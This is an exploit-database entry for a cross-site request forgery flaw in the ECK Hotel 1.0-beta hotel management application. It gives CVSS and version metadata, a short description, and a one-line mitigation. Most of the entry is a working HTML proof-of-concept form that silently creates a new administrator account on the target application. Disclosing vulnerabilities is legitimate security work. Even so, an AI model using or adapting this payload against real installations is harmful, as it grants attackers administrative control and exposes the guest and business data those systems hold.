header-logo
Suggest Exploit
vendor:
ECK Hotel
by:
Mustafa Emre Gül
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: ECK Hotel
Affected Version From: 1.0-beta
Affected Version To: 1.0-beta
Patch Exists: NO
Related CWE: N/A
CPE: eck-hotel-v1.0-beta.zip
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Win10 x64
2020

ECK Hotel 1.0 – Cross-Site Request Forgery (Add Admin)

An unauthenticated user can create an admin user by sending a POST request to the index.php?module=user/user-add page with the necessary parameters. This allows an attacker to gain administrative privileges on the ECK Hotel 1.0-beta application.

Mitigation:

Implementing a strong authentication mechanism and validating user input can help mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
# Product : ECK Hotel
# Version : 1.0-beta
# Date: 2020-03-26
# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download
# Exploit Author: Mustafa Emre Gül
# Website: https://emregul.com.tr/
# Tested On : Win10 x64
# Description : Simple Hotel Management System.


PoC:
<!--Unauthenticated Create Admin User -->
<html>
  <body>
      <form action="localhost/index.php?module=user/user-add" method="POST">
      <input type="hidden" name="nama" value="meg" />
      <input type="hidden" name="id_user_role" value="1" />
      <input type="hidden" name="jabatan" value="meg" />
      <input type="hidden" name="nomor_telp" value="1" />
      <input type="hidden" name="username" value="meg" />
      <input type="hidden" name="password" value="meg" />
      <input type="hidden" name="user-add" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR